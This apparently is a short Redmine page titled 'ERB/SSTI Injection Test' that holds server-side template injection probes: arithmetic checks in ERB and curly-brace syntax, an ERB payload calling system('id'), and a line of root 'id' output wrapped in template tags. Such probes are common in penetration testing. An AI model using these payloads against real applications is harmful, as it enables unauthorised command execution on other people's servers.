Project

General

Profile

Actions

ERB/SSTI Injection Test\n\nERB test: <%= 7*7 %>\n\nERB test2: <%25= 7*7 %>\n\nSSTI Rails: {{7*7}}\n\nRuby eval: <%= system('id') %>\n\nTextile eval: <%= uid=0(root) gid=0(root) groups=0(root) %>

Updated by Redmine Admin about 16 hours ago ยท 1 revisions